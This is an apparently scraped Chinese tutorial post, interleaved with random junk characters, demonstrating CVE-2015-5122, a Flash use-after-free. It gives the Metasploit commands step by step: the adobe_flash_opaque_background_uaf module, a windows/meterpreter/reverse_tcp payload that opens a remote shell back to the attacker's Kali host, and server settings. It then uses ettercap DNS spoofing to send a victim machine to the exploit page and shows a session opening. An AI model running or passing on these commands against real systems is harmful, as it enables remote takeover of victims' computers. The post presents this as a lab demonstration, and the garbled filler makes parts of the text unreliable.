cve2015-5122漏洞实例演示虚拟机

admin

二、cve2015-5122漏洞实例演示虚拟机

1 S8 n, D0 K8 k; l* R7 m   关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ' s- B5 c+ e0 a. k( R7 `- j/ W- q

) E" q1 X& }1 o9 M. r! K' G

9 Z0 e6 _, C' \- P search cve-2015-5122如图： 2 z5 B6 H4 d' K" R: @

% l$ V9 W9 h g( ]- |  

+ W1 @/ ^( ?( C: b

% h6 |1 [* T$ T! N' J 下面我们敲如下命令： , Y2 r$ R+ G+ v' |( [: ^! p

O) |+ X! u* V& L# L) V

# O, w2 p m7 M: ~) \) K5 j use exploit/multi/browser/adobe_flash_opaque_background_uaf

4 t: Z% @5 c: Q! W; p# D set PAYLOAD windows/meterpreter/reverse_tcp * H/ @6 Q! e* H) p' w

9 K$ A3 f% e& \/ u# a" ]4 B; F

" Q, h# l" H9 a, T( ~ set LHOST 192.168.0.109

9 [2 L7 u9 w9 S* b

5 g: r2 K5 y" R) a+ N1 c7 G+ a set URIPATH /                        /*根目录*/

3 C3 |/ b+ r; g' |) r4 B- b% {! U+ {

set SRVHOST 192.168.0.109  //192.168.0.109为kaili ip地址

+ j: F6 L: B, l- a2 j set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用

; U4 ^. P# [3 c- x3 [ o! p

然后show options如图： ! Z0 |- n* Y B8 Y

' N( C) k6 V& c" ?& Y! U

6 q# W& [' o5 N" t/ d, j+ F: o; m. o f  

, N3 p/ j- O5 b; ?

一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
! C$ H+ h: {& L5 l5 y8 S0 E5 t 2 h' p! f3 ~' c' f

2 `' [- I" L7 k' p6 V1 w/ ^9 G

然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 " d& ~4 B9 W, E' u3 P1 J$ |" W

Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf

/ L v9 L: l! U% Q% k   1 Q" H% T* y$ Q$ T% v1 ~

1 ?1 X, \& V2 k; A: P5 G

`4 _5 K- i4 {" o4 T* Z 成功了，这时候我们断开ettercap，如图：

  : J, Q. O. d& L9 H% [

$ Z5 ^; ? {9 y( D: A% C* v4 ^2 C Screenshot如图： ( u/ Y8 ] S( |; ~! g

 

; V7 `3 c; o0 J9 |; V- A" B